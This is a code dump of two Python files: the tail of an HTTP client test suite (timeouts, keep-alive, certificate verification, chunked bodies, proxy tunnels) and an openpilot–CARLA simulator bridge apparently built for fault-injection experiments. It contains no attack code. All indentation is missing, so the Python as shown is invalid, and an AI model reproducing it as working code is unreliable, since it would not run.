'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'IM_A_TEAPOT',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'UNAVAILABLE_FOR_LEGAL_REASONS',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
'EARLY_HINTS',
'TOO_EARLY'
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.source_port = socket_helper.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
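# The table above encodes the standard reuse rules: HTTP/1.1 connections
# persist unless the server sends "Connection: close", and HTTP/1.0
# connections close unless the server sends "Connection: keep-alive";
# the token comparison is case-insensitive.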
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with socket_helper.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with socket_helper.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'key_file, cert_file and check_hostname are deprecated',
DeprecationWarning)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to sending chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as f:
f.write("body")
with open(os_helper.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(os_helper.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
bridge_acclimt4-2.py
|
#!/usr/bin/env python3
import argparse
import carla # pylint: disable=import-error
import math
import numpy as np
import time
import threading
from cereal import log
from multiprocessing import Process, Queue
from typing import Any
import cereal.messaging as messaging
from common.params import Params
from common.numpy_fast import clip
from common.realtime import Ratekeeper, DT_DMON
from lib.can import can_function
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
import sys,os,signal
# from sys import argv
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--low_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town04_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point',
type=int, default=16)
parser.add_argument('--cruise_lead', type=int, default=80) #(1 + 80%)V0 = 1.8V0
parser.add_argument('--cruise_lead2', type=int, default=80) #(1 + 80%)V0 = 1.8V0 #change speed in the middle
parser.add_argument('--init_dist', type=int, default=100) #meters; initial relative distance between vehicle and vehicle2
# parser.add_argument('--faultinfo', type=str, default='')
# parser.add_argument('--scenarioNum', type=int, default=1)
# parser.add_argument('--faultNum', type=int, default=1)
args = parser.parse_args()
W, H = 1164, 874
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
vEgo = 60 #mph #set in selfdrive/controlsd
FI_Enable = True #False: run the code in fault-free mode; True: enable the fault injection engine
reInitialize_bridge = False
Mode_FI_duration = 0 # 0: FI lasts 2.5s after t_f; 1: FI whenever context is True between [t_f,t_f+2.5s]
Driver_react_Enable = False
Other_vehicles_Enable = False
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
sm = messaging.SubMaster(['carControl','controlsState','radarState','modelV2'])
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button= 0
self.is_engaged=False
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
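# e.g. steer_rate_limit(0.0, 2.0) -> 0.5 and steer_rate_limit(0.0, -2.0) -> -0.5,
# so a large commanded jump is spread across several 0.5-degree steps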
frame_id = 0
def cam_callback(image):
global frame_id
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"image": img.tobytes(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
frame_id += 1
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['pandaState'])
while not exit_event.is_set():
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
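# e.g. a CARLA velocity of (x=3, y=-4, z=0) maps to vNED = [4, 3, 0],
# since moving toward -Y in CARLA is moving north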
dat.gpsLocationExternal = {
"timestamp": int(time.time() * 1000),
"flags": 1, # valid fix
"accuracy": 1.0,
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"bearingAccuracyDeg": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"speed": vehicle_state.speed,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
# Create a radar callback that just prints the data
# def radar_callback(weak_radar, sensor_data):
def radar_callback(sensor_data):
# # self = weak_radar()
# # if not self:
# # return
# print("==============",len(sensor_data),'==============')
# for detection in sensor_data:
# print(detection)
# # print('depth: ' + str(detection.depth)) # meters
# # print('azimuth: ' + str(detection.azimuth)) # rad
# # print('altitude: ' + str(detection.altitude)) # rad
# # print('velocity: ' + str(detection.velocity)) # m/s
ret = 0#sensor_data[0]
collision_hist = []
def collision_callback(col_event):
collision_hist.append(col_event)
# print(col_event)
laneInvasion_hist = []
def laneInvasion_callback(LaneInvasionEvent):
laneInvasion_hist.append(LaneInvasionEvent)
def fake_driver_monitoring(exit_event: threading.Event):
pm = messaging.PubMaster(['driverState','driverMonitoringState'])
while not exit_event.is_set():
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs: VehicleState, exit_event: threading.Event):
i = 0
while not exit_event.is_set():
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i+=1
def bridge(q):
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
print("test======================================================================")
print(args.town)
if args.low_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Particles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
spawn_point = spawn_points[args.num_selected_spawn_point] # y -= 100+
spawn_point.location.y -= 80
#=====add 1st vehicle=====
spawn_point1 = carla.Transform(spawn_point.location,spawn_point.rotation)
# spawn_point1.location.y += 20
vehicle = world.spawn_actor(vehicle_bp, spawn_point1)
#=====add second vehicle=====
spawn_point2 = carla.Transform(spawn_point.location,spawn_point.rotation)
spawn_point2.location.y += args.init_dist#20
vehicle2 = world.spawn_actor(vehicle_bp, spawn_point2)
# vehicle2.set_autopilot(True)
#==========3rd vehicle===========
if Other_vehicles_Enable:
spawn_point3 = carla.Transform(spawn_point.location,spawn_point.rotation)
spawn_point3.location.y -= 35
spawn_point3.location.x += 7
spawn_point3.rotation.yaw += 25
vehicle3 = world.spawn_actor(vehicle_bp, spawn_point3) #following vehicle
spawn_point4 = carla.Transform(spawn_point1.location,spawn_point1.rotation)
spawn_point4.location.x += 4
spawn_point4.location.y += 15
vehicle4 = world.spawn_actor(vehicle_bp, spawn_point4)
spawn_point5 = carla.Transform(spawn_point1.location,spawn_point1.rotation)
spawn_point5.location.x += 5
spawn_point5.location.y -= 15
spawn_point5.rotation.yaw += 13
vehicle5 = world.spawn_actor(vehicle_bp, spawn_point5)
spectator = world.get_spectator()
transform = vehicle.get_transform()
spectator.set_transform(carla.Transform(transform.location + carla.Location(z=150), carla.Rotation(pitch=-90)))
#======end line===============
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
print('max_steer_angle',max_steer_angle) #70 degree
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
# # Get radar blueprint
# radar_bp = blueprint_library.filter('sensor.other.radar')[0]
# # Set Radar attributes, by default are:
# radar_bp.set_attribute('horizontal_fov', '30') # degrees
# radar_bp.set_attribute('vertical_fov', '30') # degrees
# # radar_bp.set_attribute('points_per_second', '1500')
# radar_bp.set_attribute('range', '100') # meters
# # Spawn the radar
# radar = world.spawn_actor(radar_bp, transform, attach_to=vehicle, attachment_type=carla.AttachmentType.Rigid)
# # weak_radar = weakref.ref(radar)
# # radar.listen(lambda sensor_data: radar_callback(weak_radar, sensor_data))
# radar.listen(lambda sensor_data: radar_callback(sensor_data))
# # radar.listen(radar_callback)
#collision sensor detector
colsensor_bp = blueprint_library.find("sensor.other.collision")
colsensor = world.spawn_actor(colsensor_bp, transform, attach_to=vehicle)
colsensor.listen(lambda colevent: collision_callback(colevent))
#lane invasion
laneInvasion_bp = blueprint_library.find("sensor.other.lane_invasion")
laneInvasion = world.spawn_actor(laneInvasion_bp, transform, attach_to=vehicle)
laneInvasion.listen(lambda LaneInvasionEvent: laneInvasion_callback(LaneInvasionEvent))
# launch fake car threads
threads = []
exit_event = threading.Event()
threads.append(threading.Thread(target=panda_state_function, args=(exit_event,)))
threads.append(threading.Thread(target=fake_driver_monitoring, args=(exit_event,)))
threads.append(threading.Thread(target=can_function_runner, args=(vehicle_state, exit_event,)))
for t in threads:
t.start()
time.sleep(1)
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05) #rate =100, T=1/100s=10ms
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 #keyboard signal is always 1
brake_manual_multiplier = 0.7 #keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO #keyboard signal is always 1
tm = client.get_trafficmanager(8008)
